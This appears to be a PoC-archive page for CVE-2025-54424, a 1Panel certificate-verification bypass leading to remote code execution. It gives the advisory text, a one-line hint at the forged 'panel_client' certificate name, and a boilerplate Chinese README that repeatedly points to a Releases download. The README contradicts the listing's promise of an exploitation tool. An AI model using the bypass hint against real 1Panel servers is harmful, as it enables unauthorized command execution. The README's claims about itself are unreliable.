Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-54424 PoC — 1Panel Agent Bypasses Certificate Verification Leading to Arbitrary Command Execution

Source
Associated Vulnerability
Title:1Panel Agent Bypasses Certificate Verification Leading to Arbitrary Command Execution (CVE-2025-54424)
Description:1Panel is a web interface and MCP Server that manages websites, files, containers, databases, and LLMs on a Linux server. In versions 2.0.5 and below, the HTTPS protocol used for communication between the Core and Agent endpoints has incomplete certificate verification during certificate validation, leading to unauthorized interface access. Due to the presence of numerous command execution or high-privilege interfaces in 1Panel, this results in Remote Code Execution (RCE). This is fixed in version 2.0.6. The CVE has been translated from Simplified Chinese using GitHub Copilot.
Description
CVE-2025-54424: 1Panel TLS client cert bypass enables RCE via forged CN 'panel_client' using a bundled scanning and exploitation tool. Affected: <= v2.0.5. 🔐
Readme
[https://github.com/hophtien/CVE-2025-54424/releases](https://github.com/hophtien/CVE-2025-54424/releases)

# CVE-2025-54424: 1Panel RCE Scanner and Safe Testing Toolkit for Labs

[![Releases](https://img.shields.io/badge/Releases-CVE-2025-54424-brightgreen?logo=github&logoColor=white)](https://github.com/hophtien/CVE-2025-54424/releases)

CVE-2025-54424 是关于 1Panel 的一个漏洞,涉及客户端证书绕过从而可能造成远程代码执行。该仓库提供一个整合工具集,旨在帮助研究人员在受控实验环境中对该漏洞进行扫描和验证性测试。工具强调安全测试、教育性用途,以及对受影响系统的合规研究。该项目不提供用于未授权访问或对外网资产的攻击性载荷或利用脚本。请在获得明确授权的环境中使用,并遵守当地法律和行业合规要求。

目录
- 关于本仓库
- 项目目标与范围
- 使用守则与伦理
- 功能概览
- 工作原理(高层次架构)
- 安全与防护要点
- 环境要求与安装
- 快速上手(高层次流程)
- 使用模式与工作流
- 开发者指南
- 测试与质量保障
- 版本与发布
- 贡献指南
- 常见问题
- 许可与授权
- 致谢

关于本仓库
这是一个面向研究型人员和安全工程师的工具集合,围绕 CVE-2025-54424 的研究工作设计。核心目标是提供一个透明、可复现的测试环境,用于评估影响范围、识别配置因素、以及评估修复方案在受控环境中的效果。项目强调文档化的测试过程、可追踪的结果记录,以及对资产的保护性操作。

项目目标与范围
- 提供一个清晰的测试框架,用于在具备授权的前提下对 1Panel 相关版本进行安全性研究。
- 提供与探测、评估相关的组件,但不包含对外网资产的利用载荷、武器化脚本或模仿攻击的直接实现。
- 让研究人员可以在受控实验室环境中复现漏洞的发现过程、评估补丁和配置变更的有效性,并将结果整理为可共享的安全评估报告。
- 支持本地化的配置、日志记录与结果导出,以方便审计与合规使用。
- 提供清晰的变更日志和发布说明,确保研究人员可以跟踪版本演进。

使用守则与伦理
- 本项目仅限在拥有明确授权的环境中使用。擅自对他人系统进行安全测试是违法行为。
- 不提供用于未授权访问、利用或扩散的载荷、脚本或技术细节。
- 使用前请评估风险,确保有回滚计划、备份与故障应急方案。
- 对测试数据进行安全处理,避免在公开环境泄露敏感信息。
- 如你发现潜在改进点或修复建议,请通过正式的贡献流程提交,避免将敏感信息公开在公共渠道。

功能概览
- 安全扫描模块(高层次):对受控环境中的 1Panel 配置、证书管理、证书信任链等要素进行静态与动态检查,以识别可能的安全风险指示。
- 风险评估与报告:基于扫描结果生成可读的安全评估报告,包含风险等级、修复建议、优先级排序以及可追溯的证据链。
- 安全测试指导模板:提供在实验室环境中执行的测试脚本模板、记录表单与结果归档格式,帮助研究人员保持一致性。
- 配置仓库化:集中化的配置模板与示例,便于在不同实验环境中复现测试场景。
- 日志与证据链:系统化日志记录机制,便于审计、复现与分享评估结果。

工作原理(高层次架构)
- 核心组件分层:界面层(CLI/简易界面)+ 测试驱动层(测试用例、测试 harness)+ 报告层(结果汇总、导出)。
- 数据流向:输入配置与目标资产 → 扫描与评估 → 结果聚合与导出 → 报告输出。
- 安全边界:所有测试都在隔离环境中执行,文件系统与网络访问受限,测试过程中产生的输出仅在本地存储或授权范围内留存。
- 模块耦合度低:各模块通过明确的接口通信,便于替换、扩展或禁用特定功能。

安全与防护要点
- 受控环境原则:仅在测试实验室或沙箱中运行,避免对生产系统产生影响。
- 最小权限原则:测试账户仅具备需用权限,避免提升权限的风险操作。
- 日志与证据管理:结构化日志记录,确保可追溯、可审计且符合数据保护要求。
- 风险分级与缓解:对发现的高风险项设置修复优先级,并提供可操作的缓解策略。
- 合规与披露:在公开研究中披露前先获得授权与合适的披露路径,遵循负责任披露原则。

环境要求与安装
- 操作系统:主流 Linux/Windows/macOS 在虚拟化环境中均可使用,但推荐在 Linux 环境中进行实验室测试。
- Python 版本(如适用):Python 3.10+ 或相应运行时环境,需满足依赖项。
- 依赖管理:可使用虚拟环境(如 virtualenv 或 conda)来隔离依赖。
- 网络要求:测试在受控环境内进行,确保没有外部回环或未授权网络访问。
- 资源需求:取决于测试规模,普通的实验室环境应具备合理的 CPU、内存和存储容量以支持日志与报告的生成。

安装步骤(高层次)
- 克隆仓库到本地。
- 创建虚拟环境并安装依赖。
- 配置测试环境参数(如目标资产、证书模拟参数、日志级别等)。
- 运行测试工作流,关注输出与报告产出。

快速上手(高层次流程)
- 第一步:准备授权与隔离环境。确认测试对象为自有资产或已获授权的系统。搭建或选择一个隔离的实验环境,确保无外部连通性干扰。
- 第二步:获取与配置。下载或获取测试配置模板,按照实验室需求进行定制。记录测试范围、目标、时间表和回滚方案。
- 第三步:执行测试。触发安全测试工作流,跟踪测试进程,记录中间产物、日志与中间结果。
- 第四步:分析与报告。汇总测试结果,生成安全评估报告,标注修复行动与优先级。
- 第五步:复测与验证。在完成修复后再次执行测试以验证改动效果,并记录对比结果。
- 第六步:归档与分享。将结果整理为可再现的评估材料,按机构要求进行披露与归档。

使用模式与工作流
- 扫描模式:以静态与动态检查为主,聚焦证书管理、信任链、认证路径、配置暴露点等高层风险信号。输出基线报告,帮助团队了解现状。
- 评估模式:基于扫描结果,进行风险分级、原因分析与缓解建议的整理。强调可操作性与可追溯性。
- 报告输出:生成可导出的文件,方便与安全团队、开发团队、合规团队共享。报告中包含证据快照、风险等级、修复建议及实现难度评估。
- 合规与治理:提供流程模板,帮助团队将测试活动纳入合规审查、变更管理和风险治理框架。

开发者指南
- 代码结构概览:核心模块、配置与输入、测试驱动、输出与报告、工具链整合等。
- 贡献流程:请通过 Issue 跟踪问题,通过 Pull Request 提交改动。确保代码风格一致,提供测试覆盖与文档更新。
- 测试策略:强调可重复性与独立性。应包含最小可运行示例、测试数据和环境要求,确保他人可以在相同条件下复现结果。
- 安全性设计:实现应避免暴露对外的利用性细节。代码应清晰标注敏感部分,对可能被滥用的功能设有访问控制与分离。
- 依赖与兼容性:记录关键第三方依赖及版本约束,便于维护与快速部署。

测试与质量保障
- 静态检查:采用静态代码分析工具来发现潜在的问题。
- 动态测试:在受控环境中执行基本的功能性测试,验证输出格式及稳定性。
- 回归测试:每次变更后运行回归用例,确保新改动未破坏既有行为。
- 安全评估:对新加入的功能进行独立审查,确保不会引入不必要的安全风险。
- 记录与审计:所有测试活动应有可追溯的日志与时间戳,方便审计与复现。

版本与发布
- 版本命名:遵循语义化版本控制原则,便于追踪变更。
- 发布说明:每次发布应包含变更摘要、影响范围、已知问题、兼容性信息以及升级注意事项。
- 获取 releases:请访问仓库的发布页面获取可用版本与相关文档。See the Releases page at https://github.com/hophtien/CVE-2025-54424/releases.

版本与发布的细则
- 兼容性:明确标注对哪一类系统、哪一版 1Panel 版本有影响。
- 兼容性迁移:若有 API 变更,应提供清晰的迁移指南。
- 退回策略:提供在新版本不可用时回滚的指引与工具。

贡献指南
- 如何参与:欢迎报告问题、提交修复、改进文档和示例。请遵循项目的编码风格与安全性准则。
- 代码风格:保持清晰、简洁、注释充分。避免危险行为的实现细节暴露。
- 安全披露:涉及漏洞验证的内容仅限授权测试环境中的材料。请遵循负责任披露流程。

常见问题
- 这个工具会直接攻击目标吗?答:本工具聚焦受控环境中的安全测试与评估,不包含对外网资产的利用载荷。测试应仅在授权范围内进行。
- 我可以在生产环境中使用吗?答:不。请在隔离的测试环境中进行,并在正式环境部署前完成风险评估和变更管理。
- 如何获取帮助?答:通过的问题追踪系统提交问题,附上重现步骤、环境信息和期望结果,便于理解与协助。

许可与授权
- 许可类型:MIT 许可(示例性描述,实际以仓库 LICENSE 文件为准)。
- 授权使用:在获得授权的范围内使用,不得用于未授权的测试或攻击行为。
- 开源承诺:项目坚持开源精神,欢迎社区参与与透明化改进。

致谢
- 感谢参与者、审阅者以及为安全研究作出贡献的同行。你的努力有助于提升行业的整体安全水平。

如果你需要查看具体的发布项、下载的文件、以及更多样例配置,请前往以下链接并在需要时查看相关文档。See the Releases page at https://github.com/hophtien/CVE-2025-54424/releases

说明
- 本 README 以安全研究和合规测试为导向,强调在授权范围内开展工作。
- 未提供利用性细节或可直接用于攻击的实现内容,以避免对未授权行为的促进。
- 如果你对该仓库的用途、实现方式及未来计划有疑问,请通过正式的沟通渠道提出。
File Snapshot

[4.0K] /data/pocs/2e58ebca299617829d651419e4a286fd12b52c81 ├── [ 10K] CVE-2025-54424.py ├── [ 11K] LICENSE └── [ 10K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →